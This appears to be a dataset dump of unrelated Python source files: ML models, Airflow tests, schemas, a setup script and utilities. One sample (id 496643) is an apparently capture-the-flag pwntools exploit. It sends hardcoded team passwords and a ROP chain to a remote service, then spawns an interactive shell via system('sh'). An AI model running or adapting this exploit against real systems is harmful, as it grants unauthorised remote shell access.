id
stringlengths
3
8
content
stringlengths
100
981k
496597
import torch from rlil.nn import RLNetwork from .approximation import Approximation class Discriminator(Approximation): def __init__( self, model, optimizer, name='discriminator', **kwargs ): model = DiscriminatorModule(model) super().__init__( model, optimizer, name=name, **kwargs ) def expert_reward(self, features): rew = torch.log(self.model(features)) - \ torch.log(1 - self.model(features)) return rew.squeeze().detach() class DiscriminatorModule(RLNetwork): def forward(self, features): return self.model(features)
496609
import tensorflow as tf from .math import sparse_tensor_diag_matmul, sparse_scalar_multiply def rescaled_laplacian(adj): """Creates a tensorflow (rescale) laplacian matrix out of a SparseTensorValue adjacency matrix.""" degree = tf.sparse_reduce_sum(adj, axis=1) degree = tf.cast(degree, tf.float32) degree = tf.pow(degree, -0.5) lap = sparse_tensor_diag_matmul(adj, degree, transpose=True) lap = sparse_tensor_diag_matmul(lap, degree, transpose=False) return sparse_scalar_multiply(lap, -1)
496617
import math import torch import torch.nn as nn import torch.nn.functional as F from fairseq import utils from fairseq.models import ( FairseqModel, FairseqEncoder, FairseqIncrementalDecoder, register_model, register_model_architecture, ) from examples.pervasive.module import ( build_convnet, build_aggregator, ) from fairseq.modules import ( SinusoidalPositionalEmbedding, LearnedPositionalEmbedding, ) @register_model('attn2d_waitk') class Attn2dWaitkModel(FairseqEncoderDecoderModel): def __init__(self, encoder, decoder): super().__init__(encoder, decoder) def get_lenx(self, encoder_out): return encoder_out['encoder_out'].size(1) @staticmethod def add_args(parser): """ Add model-specific arguments to the parser. """ """ Embeddings """ parser.add_argument('--pooling-policy', type=str, default='row', help='Policy for pooling the grid') parser.add_argument('--skip-output-mapping', action='store_true', help='remove the final mapping if equal dimension') parser.add_argument('--share-all-embeddings', action='store_true', help='share encoder, decoder and output embeddings' ' (requires shared dictionary and embed dim)') parser.add_argument('--share-decoder-input-output-embed', action='store_true', help='share decoder input and output embeddings') parser.add_argument('--add-positional-embeddings', default=False, action='store_true', help='if set, enables positional embeddings') parser.add_argument('--learned-pos', action='store_true', help='use learned positional embeddings') parser.add_argument('--encoder-embed-path', type=str, metavar='STR', help='path to pre-trained encoder embedding') parser.add_argument('--decoder-embed-path', type=str, metavar='STR', help='path to pre-trained decoder embedding') parser.add_argument('--encoder-embed-dim', type=int, metavar='N', help='encoder embedding dimension') parser.add_argument('--decoder-embed-dim', type=int, metavar='N', help='decoder embedding dimension') parser.add_argument('--ffn-dim', type=int, help='ffn dimension') parser.add_argument('--reduce-dim', type=int, help='first conv output dimension') parser.add_argument('--double-masked', action='store_true', help='Mask the future source as well') parser.add_argument('--conv-groups', type=int, help='convolution groups') parser.add_argument('--source-dilation', default=1, type=int, help='2nd dimension dilation') parser.add_argument('--target-dilation', default=1, type=int, help='1st dimension dilation') parser.add_argument('--conv-stride', default=1, type=int, help='2nd dimension stride') parser.add_argument('--maintain-resolution', default=1, type=int, help='pad so that the output dimension matches the input') parser.add_argument('--output-dim', type=int, help='pre-softmax output dimension') parser.add_argument('--embeddings-ln', action='store_true', help='add LN after the embeddings') parser.add_argument('--network', type=str, metavar='STR', help='Type of cnv net between denseNet or resNet') parser.add_argument('--blocks', type=str, metavar='STR', help='specific architecture that overwrites the kernel, growth...') parser.add_argument('--kernel-size', type=int, help='kernel size') parser.add_argument('--bn-size', type=int, help='bn size in the dense layer') parser.add_argument('--growth-rate', type=int, help='growth rate') parser.add_argument('--num-layers', type=int, help='number of layers') parser.add_argument('--convolution-dropout', type=float, metavar='D', help='dropout probability in the conv layers') parser.add_argument('--input-dropout', type=float, metavar='D', help='dropout probability on the initial 2d input') parser.add_argument('--embeddings-dropout', type=float, metavar='D', help='dropout probability on the embeddings') parser.add_argument('--prediction-dropout', type=float, metavar='D', help='dropout on the final prediction layer') parser.add_argument('--init-weights', type=str, metavar='STR', help='the type of weight initialiation') parser.add_argument('--divide-channels', type=int, metavar='INT', help='the factor to reduce the input channels by') parser.add_argument('--skip-last-trans', type=bool, help='whether to transition at the last layer') parser.add_argument('--memory-efficient', action='store_true', help='use checkpointing') parser.add_argument('--trans-norm', type=bool, help='transition batch norm') parser.add_argument('--final-norm', type=bool, help='final batch norm') parser.add_argument('--layer1-norm', type=bool, help='first layer batch norm') parser.add_argument('--layer2-norm', type=bool, help='second layer batch norm') parser.add_argument('--initial-shift', type=int, default=3, help='Initial shift') parser.add_argument('--read-normalization', type=str, default='max', help='Normalization of the read/write proba from the softmax over the full vocabulary') parser.add_argument('--waitk-policy', type=str, default='path', help='The type of fixed policy with fixed mnaginals') parser.add_argument('--waitk', type=int, default=3, help='Fixed policy shift') parser.add_argument('--waitk-delta', type=int, default=1, help='Fixed policy stepsize') parser.add_argument('--waitk-catchup', type=int, default=1, help='Fixed policy catchup') def log_tensorboard(self, writer, iter): pass @classmethod def build_model(cls, args, task): """ Build a new model instance. """ base_architecture(args) if not hasattr(args, 'max_source_positions'): args.max_source_positions = 1024 if not hasattr(args, 'max_target_positions'): args.max_target_positions = 1024 src_dict, tgt_dict = task.source_dictionary, task.target_dictionary def build_embedding(dictionary, embed_dim, path=None): num_embeddings = len(dictionary) padding_idx = dictionary.pad() emb = Embedding(num_embeddings, embed_dim, padding_idx) # if provided, load from preloaded dictionaries if path: embed_dict = utils.parse_embedding(path) utils.load_embedding(embed_dict, dictionary, emb) return emb if args.share_all_embeddings: if src_dict != tgt_dict: raise RuntimeError('--share-all-embeddings requires a joined dictionary') if args.encoder_embed_dim != args.decoder_embed_dim: raise RuntimeError( '--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim') if args.decoder_embed_path and ( args.decoder_embed_path != args.encoder_embed_path): raise RuntimeError('--share-all-embeddings not compatible with --decoder-embed-path') encoder_embed_tokens = build_embedding( src_dict, args.encoder_embed_dim, args.encoder_embed_path ) decoder_embed_tokens = encoder_embed_tokens args.share_decoder_input_output_embed = True else: encoder_embed_tokens = build_embedding( src_dict, args.encoder_embed_dim, args.encoder_embed_path ) decoder_embed_tokens = build_embedding( tgt_dict, args.decoder_embed_dim, args.decoder_embed_path ) encoder = Attn2dEncoder(args, src_dict, encoder_embed_tokens) decoder = Attn2dDecoder(args, tgt_dict, decoder_embed_tokens) return cls(encoder, decoder) def max_decoder_positions(self): """ Maximum input length supported by the decoder """ return self.decoder.max_target_positions class Attn2dEncoder(FairseqEncoder): def __init__(self, args, dictionary, embed_tokens, left_pad=False): super().__init__(dictionary) embed_dim = embed_tokens.embedding_dim self.padding_idx = embed_tokens.padding_idx self.max_source_positions = args.max_source_positions self.embed_tokens = embed_tokens self.embed_scale = math.sqrt(embed_dim) self.embed_positions = PositionalEmbedding( self.max_source_positions, embed_dim, self.padding_idx, left_pad=left_pad, learned=args.learned_pos, ) if args.add_positional_embeddings else None self.ln = lambda x: x if args.embeddings_ln: self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True) self.embedding_dropout = nn.Dropout(args.embeddings_dropout) def forward(self, src_tokens, src_lengths=None, **kwargs): x = self.embed_scale * self.embed_tokens(src_tokens) if self.embed_positions is not None: x += self.embed_positions(src_tokens) x = self.ln(x) x = self.embedding_dropout(x) encoder_padding_mask = src_tokens.eq(self.padding_idx) return { 'encoder_out': x, # B, Ts 'encoder_padding_mask': encoder_padding_mask # B, Ts } def max_positions(self): """Maximum input length supported by the encoder.""" if self.embed_positions is None: return self.max_source_positions return min(self.max_source_positions, self.embed_positions.max_positions()) def reorder_encoder_out(self, encoder_out, new_order): """ Reorder encoder output according to *new_order*. Args: encoder_out: output from the ``forward()`` method new_order (LongTensor): desired order Returns: *encoder_out* rearranged according to *new_order* """ if encoder_out['encoder_out'] is not None: encoder_out['encoder_out'] = \ encoder_out['encoder_out'].index_select(0, new_order) if encoder_out['encoder_padding_mask'] is not None: encoder_out['encoder_padding_mask'] = \ encoder_out['encoder_padding_mask'].index_select(0, new_order) return encoder_out class Attn2dDecoder(FairseqIncrementalDecoder): """ Pervasive Attention Model """ def __init__(self, args, dictionary, embed_tokens, left_pad=False): super().__init__(dictionary) self.share_input_output_embed = args.share_decoder_input_output_embed embed_dim = embed_tokens.embedding_dim self.padding_idx = embed_tokens.padding_idx self.eos = dictionary.eos() self.max_target_positions = args.max_target_positions self.embed_tokens = embed_tokens self.embed_scale = math.sqrt(embed_dim) self.embed_positions = PositionalEmbedding( args.max_target_positions, embed_dim, self.padding_idx, left_pad=False, learned=args.learned_pos, ) if args.add_positional_embeddings else None self.ln = lambda x: x if args.embeddings_ln: self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True) self.embedding_dropout = nn.Dropout(args.embeddings_dropout) self.input_dropout = nn.Dropout(args.input_dropout) self.input_channels = args.encoder_embed_dim + args.decoder_embed_dim self.output_dim = args.output_dim self.kernel_size = args.kernel_size print('Input channels:', self.input_channels) self.net = build_convnet(args) if args.network == 'densenet': self.net = DenseNet_CP(self.input_channels, args) elif args.network == 'resnet': self.net = ResNet3(self.input_channels, args) elif args.network == 'resnet_addup': self.net = ResNetAddUp2(self.input_channels, args) elif args.network == 'resnet_addup_nonorm': self.net = ResNetAddUpNoNorm(self.input_channels, args) else: raise ValueError('Unknown architecture %s' % args.network) self.output_channels = self.net.output_channels print('Output channels:', self.output_channels) self.decoder_dim = args.decoder_embed_dim if args.pooling_policy == 'row': self.pool_and_select_context = RowPool(args) else: raise ValueError('Unknown pooling strategy %s' % args.pooling_policy) if not self.output_dim == self.decoder_dim or not args.skip_output_mapping: self.projection = Linear(self.decoder_dim, self.output_dim, dropout=args.prediction_dropout) else: self.projection = None print('Projection layer:', self.projection) self.prediction_dropout = nn.Dropout(args.prediction_dropout) self.vocab_size = len(dictionary) self.prediction_dropout = nn.Dropout(args.prediction_dropout) if self.share_input_output_embed: self.prediction = Linear(self.decoder_dim, len(dictionary)) self.prediction.weight = self.embed_tokens.weight else: self.prediction = Linear(self.output_dim, len(dictionary)) def forward(self, prev_output_tokens, encoder_out, incremental_state=None, context_size=None, cache_decoder=True, **kwargs): # source embeddings src_emb = encoder_out['encoder_out'].clone() # N, Ts, ds Ts = src_emb.size(1) if context_size is not None: if context_size < Ts: # src_emb[:, context_size:] = 0 src_emb = src_emb.clone()[:, :context_size] # target embeddings: positions = self.embed_positions( prev_output_tokens, incremental_state=incremental_state if cache_decoder else None, ) if self.embed_positions is not None else None if incremental_state is not None and cache_decoder: # embed the last target token prev_output_tokens = prev_output_tokens[:, -1:] if positions is not None: positions = positions[:, -1:] # Build the full grid tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens) if positions is not None: tgt_emb += positions tgt_emb = self.ln(tgt_emb) tgt_emb = self.embedding_dropout(tgt_emb) src_length = src_emb.size(1) tgt_length = tgt_emb.size(1) # build 2d "image" of embeddings src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt x = self.input_dropout(x) # pass through dense convolutional layers x = self.net(x, incremental_state if cache_decoder else None) # N, Tt, Ts, C if incremental_state is not None: # Keep only the last step: x = x[:, -1:] # if context_size is not None and context_size < Ts: # x, _ = x[:, :, :context_size].max(dim=2) # N, Tt, C # else: x, _ = x.max(dim=2) # N, Tt, C x = self.projection(x) if self.projection is not None else x # N, Tt, C x = self.prediction_dropout(x) # multiply by embedding matrix to generate distribution x = self.prediction(x) # N, Tt, V return x, None # Training: # progressive pooling: x = self.pool_and_select_context(x, encoder_out['encoder_padding_mask']) # N, Tt, k, C if isinstance(x, torch.Tensor): x = self.projection(x) if self.projection is not None else x # N, Tt, k, C x = self.prediction_dropout(x) x = self.prediction(x) # N, Tt, k, C else: x = [self.projection(sub) if self.projection is not None else sub for sub in x] # N, Tt, k, C x = [self.prediction_dropout(sub) for sub in x] x = [self.prediction(sub) for sub in x] # list of (N, k, C ) * Tt return x, None def forward_one_with_update(self, prev_output_tokens, encoder_out, context_size, incremental_state=None, **kwargs): """ Update the previously emitted tokens states """ # Truncate the encoder outputs: encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]} # source embeddings src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds # target embeddings: positions = self.embed_positions( prev_output_tokens, incremental_state=None, ) if self.embed_positions is not None else None # limit to the used context: # if incremental_state is not None: # hist = min(prev_output_tokens.size(1), self.kernel_size // 2) # prev_output_tokens = prev_output_tokens#[:, -hist:] # if positions is not None: # positions = positions#[:, -hist:] # Build the full grid tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens) if positions is not None: tgt_emb += positions tgt_emb = self.ln(tgt_emb) tgt_emb = self.embedding_dropout(tgt_emb) src_length = src_emb.size(1) tgt_length = tgt_emb.size(1) # build 2d "image" of embeddings src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt x = self.input_dropout(x) # pass through dense convolutional layers # Limit to the used context: x = self.net(x) # N, Tt, Ts, C # Only the last step: x = x[:, -1:] # aggregate predictions and project into embedding space x, _ = x.max(dim=2) # N, Tt, C x = self.projection(x) if self.projection is not None else x # N, Tt, C x = self.prediction_dropout(x) # multiply by embedding matrix to generate distribution x = self.prediction(x) # N, Tt, V return x, {'attn': None} def forward_one(self, prev_output_tokens, encoder_out, context_size, incremental_state=None, **kwargs): """ Keep the previously emitted tokens states asis """ # Truncate the encoder outputs: encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]} # source embeddings src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds # target embeddings: positions = self.embed_positions( prev_output_tokens, incremental_state=incremental_state, ) if self.embed_positions is not None else None if incremental_state is not None: # embed the last target token prev_output_tokens = prev_output_tokens[:, -1:] if positions is not None: positions = positions[:, -1:] # Build the full grid tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens) if positions is not None: tgt_emb += positions tgt_emb = self.ln(tgt_emb) tgt_emb = self.embedding_dropout(tgt_emb) src_length = src_emb.size(1) tgt_length = tgt_emb.size(1) # build 2d "image" of embeddings src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt x = self.input_dropout(x) # pass through dense convolutional layers x = self.net(x, incremental_state) # N, Tt, Ts, C # aggregate predictions and project into embedding space x, _ = x.max(dim=2) # N, Tt, C x = self.projection(x) if self.projection is not None else x # N, Tt, C x = self.prediction_dropout(x) # multiply by embedding matrix to generate distribution x = self.prediction(x) # N, Tt, V return x, {'attn': None} def forward_one_old(self, prev_output_tokens, encoder_out, context_size, incremental_state=None, **kwargs): # Truncate the encoder outputs: encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]} # source embeddings src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds # target embeddings: positions = self.embed_positions( prev_output_tokens, incremental_state=incremental_state, ) if self.embed_positions is not None else None if incremental_state is not None: # embed the last target token prev_output_tokens = prev_output_tokens[:, -1:] if positions is not None: positions = positions[:, -1:] # Build the full grid tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens) if positions is not None: tgt_emb += positions tgt_emb = self.ln(tgt_emb) tgt_emb = self.embedding_dropout(tgt_emb) src_length = src_emb.size(1) tgt_length = tgt_emb.size(1) # build 2d "image" of embeddings src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt x = self.input_dropout(x) # pass through dense convolutional layers x = self.net(x, incremental_state) # N, Tt, Ts, C # progressive pooling: # x = self.pool(x, encoder_out['encoder_padding_mask']) # B x C x Tt x Ts x, _ = x.max(dim=2) # N, Tt, C x = self.projection(x) if self.projection is not None else x # N, Tt, C x = self.prediction_dropout(x) # multiply by embedding matrix to generate distribution x = self.prediction(x) # N, Tt, V return x, {'attn': None} @register_model_architecture('attn2d_waitk', 'attn2d_waitk') def base_architecture(args): args.memory_efficient = getattr(args, 'memory_efficient', False) args.skip_output_mapping = getattr(args, 'skip_output_mapping', False) args.encoder_embed_path = getattr(args, 'encoder_embed_path', None) args.decoder_embed_path = getattr(args, 'decoder_embed_path', None) args.share_decoder_input_output_embed = getattr( args, 'share_decoder_input_output_embed', False ) args.share_all_embeddings = getattr(args, 'share_all_embeddings', False) args.embeddings_dropout = getattr(args, 'embeddings_dropout', 0.) args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 256) args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 256) args.ffn_dim = getattr(args, 'ffn_dim', 512) args.output_dim = getattr(args, 'output_dim', args.decoder_embed_dim) args.divide_channels = getattr(args, 'divide_channels', 2) args.reduce_dim = getattr(args, 'reduce_dim', (args.encoder_embed_dim + args.decoder_embed_dim) // args.divide_channels) args.conv_groups = getattr(args, 'conv_groups', args.reduce_dim) args.conv_stride = getattr(args, 'conv_stride', 1) args.source_dilation = getattr(args, 'source_dilation', 1) args.target_dilation = getattr(args, 'target_dilation', 1) args.maintain_resolution = getattr(args, 'maintain_resolution', 1) args.add_positional_emnbeddings = getattr(args, 'add_positional_embeddings', False) args.learned_pos = getattr(args, 'learned_pos', False) args.embeddings_ln = getattr(args, 'embeddings_ln', False) args.input_dropout = getattr(args, 'input_dropout', 0.2) args.convolution_dropout = getattr(args, 'convolution_dropout', 0.2) args.network = getattr(args, 'network', 'densenet') args.kernel_size = getattr(args, 'kernel_size', 3) args.num_layers = getattr(args, 'num_layers', 24) args.divide_channels = getattr(args, 'divide_channels', 2) args.prediction_dropout = getattr(args, 'prediction_dropout', 0.2) args.double_masked = getattr(args, 'double_masked', True) def _expand(tensor, dim, reps): tensor = tensor.unsqueeze(dim) shape = tuple(reps if i == dim else -1 for i in range(tensor.dim())) return tensor.expand(shape) def PositionalEmbedding(num_embeddings, embedding_dim, padding_idx, left_pad, learned=False): if learned: m = LearnedPositionalEmbedding(num_embeddings + padding_idx + 1, embedding_dim, padding_idx, left_pad) nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) nn.init.constant_(m.weight[padding_idx], 0) else: m = SinusoidalPositionalEmbedding(embedding_dim, padding_idx, left_pad, num_embeddings + padding_idx + 1) return m def Embedding(num_embeddings, embedding_dim, padding_idx): m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) nn.init.constant_(m.weight[padding_idx], 0) return m def Linear(in_features, out_features, dropout=0., bias=True): m = nn.Linear(in_features, out_features, bias=bias) nn.init.normal_(m.weight, mean=0, std=math.sqrt((1 - dropout) / in_features)) nn.init.constant_(m.bias, 0) return m class RowPool(nn.Module): """ Pool the row features input shape N, Tt, Ts, C """ def __init__(self, args): super(RowPool, self).__init__() self.policy = args.waitk_policy self.waitk = args.waitk self.delta = args.waitk_delta self.catchup = args.waitk_catchup def forward(self, X, src_mask=None): if self.policy == 'path': return self.forward_path(X) if self.policy == 'above': return self.forward_above(X) def forward_path(self, X): N, Tt, Ts, C = X.size() XpoolSelect = [] for t in range(Tt): ctx = min((t // self.catchup * self.delta) + self.waitk, Ts) feat, _ = torch.max(X[:, t:t+1, :ctx], dim=2, keepdim=True) XpoolSelect.append(feat) return torch.cat(XpoolSelect, dim=1) def forward_above(self, X): N, Tt, Ts, C = X.size() XpoolSelect = [] for t in range(Tt): ctx = min((t // self.catchup * self.delta) + self.waitk, Ts) tfeats = [] for ctxplus in range(ctx, Ts+1): feat, _ = torch.max(X[:, t, :ctxplus], dim=1, keepdim=True) tfeats.append(feat) feat = torch.cat(tfeats, dim=1) XpoolSelect.append(feat) return XpoolSelect
496643
from pwn import * import sys team = int(sys.argv[2]) p = remote(sys.argv[1], 5000 + team) greeting = 0x493018 pop_x19 = 0x400790 mov_x0_x19 = 0x400788 system = 0x400e38 fill = 0x4141414141414141 if team == 0: p.send("letmeinplz\n") elif team == 1: p.send("letmein181\n") elif team == 2: p.send("letmein244\n") elif team == 3: p.send("letmein364\n") elif team == 4: p.send("letmein474\n") rop = p64(pop_x19) + "A"*0x100 rop += p64(fill) + p64(mov_x0_x19) + p64(greeting) + p64(fill) + p64(fill) + p64(fill) + p64(fill) + "A"*0x68 rop += p64(fill) + p64(system) cmd = "sh\x00" payload = cmd + "A" * (0x110 - len(cmd)) + rop while len(payload) > 0: p.send("3\n") p.send(payload.replace('\x00', 'A') + "\n") zero = payload.rfind('\x00') if zero == -1: break payload = payload[0:zero] p.send("5\n") p.interactive()
496652
import pathlib import pandas as pd import pytest from airflow.decorators import task from astro import sql as aql from astro.files import File from astro.sql.operators.sql_decorator_legacy import transform_decorator as transform from astro.sql.table import Table from tests.sql.operators import utils as test_utils cwd = pathlib.Path(__file__).parent @pytest.mark.parametrize( "sql_server", [ "snowflake", "postgres", "bigquery", "sqlite", ], indirect=True, ) def test_dataframe_transform(sql_server, sample_dag, test_table): print("test_dataframe_to_database") @aql.dataframe def get_dataframe(): return pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]}) @transform def sample_pg(input_table: Table): return "SELECT * FROM {{input_table}}" @aql.dataframe def validate_dataframe(df: pd.DataFrame): df.columns = df.columns.str.lower() df = df.sort_values(by=df.columns.tolist()).reset_index(drop=True) assert df.equals( pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]}) ) with sample_dag: my_df = get_dataframe(output_table=test_table) pg_df = sample_pg(my_df) validate_dataframe(pg_df) test_utils.run_dag(sample_dag) @pytest.mark.parametrize( "sql_server", [ "snowflake", "postgres", "bigquery", "sqlite", ], indirect=True, ) def test_transform(sql_server, sample_dag, test_table): @transform def sample_function(input_table: Table): return "SELECT * FROM {{input_table}} LIMIT 10" @aql.dataframe def validate_table(df: pd.DataFrame): assert len(df) == 10 with sample_dag: homes_file = aql.load_file( input_file=File(path=str(cwd) + "/../../../data/homes.csv"), output_table=test_table, ) first_model = sample_function( input_table=homes_file, ) inherit_model = sample_function( input_table=first_model, ) validate_table(inherit_model) test_utils.run_dag(sample_dag) @pytest.mark.parametrize( "sql_server", [ "snowflake", "postgres", "bigquery", "sqlite", ], indirect=True, ) def test_raw_sql(sql_server, sample_dag, test_table): @transform(raw_sql=True) def raw_sql_query(my_input_table: Table, created_table: Table, num_rows: int): return "SELECT * FROM {{my_input_table}} LIMIT {{num_rows}}" @task def validate_raw_sql(cur): print(cur) with sample_dag: homes_file = aql.load_file( input_file=File(path=str(cwd) + "/../../../data/homes.csv"), output_table=test_table, ) raw_sql_result = ( raw_sql_query( my_input_table=homes_file, created_table=test_table, num_rows=5, handler=lambda cur: cur.fetchall(), ), ) validate_raw_sql(raw_sql_result) test_utils.run_dag(sample_dag)
496655
from abc import ABC, abstractmethod class ModelAdaptor(ABC): """ Provides a unified interface for all emulation engines within ESEm. Concrete classes must implement both :meth:`train` and :meth:`predict` methods. See the `API documentation <../api.html#dataprocessor>`_ for a list of concrete classes implementing this interface. """ def __init__(self, model): self.model = model @abstractmethod def train(self, training_params, training_data, verbose=False, **kwargs): """ Train on the training data :return: """ @abstractmethod def predict(self, *args, **kwargs): """ This is either the tf model which can be called directly, or a generator over the model.predict (in tf, so it's quick). :return: """ class SKLearnModel(ModelAdaptor): """ A wrapper around `scikit-learn <https://scikit-learn.org>`_ models. """ def train(self, training_params, training_data, verbose=False, **kwargs): """ Train the RF model. Note that this scikit implementation can't take advantage of GPUs. """ if verbose: self.model.verbose = 1 self.model.fit(X=training_params, y=training_data, **kwargs) def predict(self, *args, **kwargs): # Requires X_pred to be of shape (n_samples, n_features) return self.model.predict(*args, **kwargs), None class KerasModel(ModelAdaptor): """ A wrapper around `Keras <https://keras.io/>`_ models """ def train(self, training_params, training_data, verbose=False, epochs=100, batch_size=8, validation_split=0.2, **kwargs): """ Train the Keras model. :param X: :param verbose: :param epochs: :param batch_size: :param float validation_split: The proportion of training data to use for validation :return: """ self.model.fit(training_params, training_data, batch_size=batch_size, epochs=epochs, validation_split=validation_split, **kwargs) def predict(self, *args, **kwargs): # This only works with the tf.keras API return self.model(*args, **kwargs), None class GPFlowModel(ModelAdaptor): """ A wrapper around `GPFlow <https://gpflow.readthedocs.io/en/master/#>`_ regression models """ def train(self, training_params, training_data, verbose=False, maxiter=100, **kwargs): import gpflow # Uses L-BFGS-B by default opt = gpflow.optimizers.Scipy() opt.minimize(self.model.training_loss, variables=self.model.trainable_variables, options=dict(disp=verbose, maxiter=maxiter), **kwargs) def predict(self, *args, **kwargs): return self.model.predict_y(*args, **kwargs)
496715
import unittest from katas.kyu_7.a_rule_of_divisibility_by_13 import thirt class ThirtTestCase(unittest.TestCase): def test_equals(self): self.assertEqual(thirt(1234567), 87) def test_equals_2(self): self.assertEqual(thirt(321), 48) def test_equals_3(self): self.assertEqual(thirt(8529), 79) def test_equals_4(self): self.assertEqual(thirt(85299258), 31) def test_equals_5(self): self.assertEqual(thirt(5634), 57) def test_equals_6(self): self.assertEqual(thirt(1111111111), 71) def test_equals_7(self): self.assertEqual(thirt(987654321), 30)
496742
import os import re import ast from setuptools import setup import PySignal with open('PySignal.py', 'rb') as f: contents = f.read().decode('utf-8') def parse(pattern): return re.search(pattern, contents).group(1).replace('"', '').strip() def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() version = parse(r'__version__\s+=\s+(.*)') author = parse(r'__author__\s+=\s+(.*)') email = parse(r'__email__\s+=\s+(.*)') classifiers = [ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.5", "Topic :: Software Development :: Libraries :: Python Modules", "Topic :: Utilities" ] setup( name="PySignal", version=version, description="Python Signal Library to mimic the Qt Signal system for event driven connections", author=author, author_email=email, url="https://github.com/dgovil/PySignal", license="MIT", zip_safe=False, py_modules=["PySignal"], classifiers=classifiers, keywords=['signals', 'qt', 'events'] )
496768
import ezdxf """Começa configuração do desenho.""" # Cria um novo desenho dwg = ezdxf.new(dxfversion='AC1032') # Endereçar o layout do desenho msp = dwg.modelspace() """Adiciona elementos ao layout.""" # Adiciona um traço no layout msp.add_line(start=(5, 0), end=(5, 10)) # Adiciona um retângulo retangulo = [(-20, 0), (0, 0), (0, 10), (-20, 10)] msp.add_lwpolyline( points=retangulo, dxfattribs={'closed': True} ) # Adiciona um triângulo triangulo = [(50, -20), (90, -20), (70, 0)] msp.add_lwpolyline(points=triangulo) # Adiciona um círculo msp.add_circle(center=(-10, -50), radius=20.5) # Adiciona um texto msp.add_text( text="Live de Python", dxfattribs={'height': 5, 'color': 5} ).set_pos((0, -10)) """Finaliza e salva o desenho.""" # Salva o desenho em arquivo dwg.saveas(filename='exemplo_1.dxf')
496775
from os import path import argparse import json import urllib import urllib.request import config from utils import URL_to_filename def load_recipes(filename): """Load recipes from disk as JSON """ with open(path.join(config.path_data, filename), 'r') as f: recipes_raw = json.load(f) print('{:,} recipes loaded from disk.'.format(len(recipes_raw))) return recipes_raw def save_picture(recipes_raw, url): recipe = recipes_raw[url] path_save = path.join( config.path_img, '{}.jpg'.format(URL_to_filename(url))) if not path.isfile(path_save): if 'picture_link' in recipe: link = recipe['picture_link'] if link is not None: try: if 'epicurious' in url: img_url = 'https://{}'.format(link[2:]) urllib.request.urlretrieve(img_url, path_save) else: urllib.request.urlretrieve(link, path_save) except: print('Could not download image from {}'.format(link)) def main(filename, status_interval=500): recipes_raw = load_recipes(filename=filename) n = len(recipes_raw) for i, r in enumerate(recipes_raw.keys()): save_picture(recipes_raw, r) if i % status_interval == 0: print('Downloading image {:,} of {:,}'.format(i, n)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--filename', type=str, default='recipes_raw.json', help='Recipe JSON file') parser.add_argument('--status', type=int, default=50, help='Print status interval') args = parser.parse_args() main(args.filename, args.status)
496804
course_config = { "type": "object", "patternProperties": {"": {"type": "array", "items": {"type": "string"}}}, } grading_stage = { "type": ["object", "null"], "properties": { "image": {"type": "string"}, "env": {"type": "object"}, "entrypoint": {"type": "array", "items": {"type": "string"}}, "networking": {"type": "boolean"}, "privileged": {"type": "boolean"}, "hostname": {"type": "string"}, "timeout": {"type": "number"}, "memory": {"type": "string"}, "logs": {"type": "boolean"}, }, "required": ["image"], "additionalProperties": False, } grading_pipeline = {"type": ["array", "null"], "items": grading_stage} grading_config = { "type": "object", "properties": { "pre_processing_pipeline": grading_pipeline, "student_pipeline": grading_pipeline, "post_processing_pipeline": grading_pipeline, "env": {"type": ["object", "null"]}, }, "required": ["student_pipeline"], "additionalProperties": False, } ws_api_msg = { "type": "object", "properties": {"type": {"type": "string"}, "args": {"type": "object"}}, "required": ["type", "args"], "additionalProperties": False, }
496810
from django import forms from djangocms_text_ckeditor.fields import HTMLFormField class SimpleTextForm(forms.Form): text = HTMLFormField()
496811
from ota_update.main.ota_updater import OTAUpdater def download_and_install_update_if_available(): o = OTAUpdater('url-to-your-github-project') o.download_and_install_update_if_available('wifi-ssid', 'wifi-password') def start(): # your custom code goes here. Something like this: ... # from main.x import YourProject # project = YourProject() # ... def boot(): download_and_install_update_if_available() start() boot()
496824
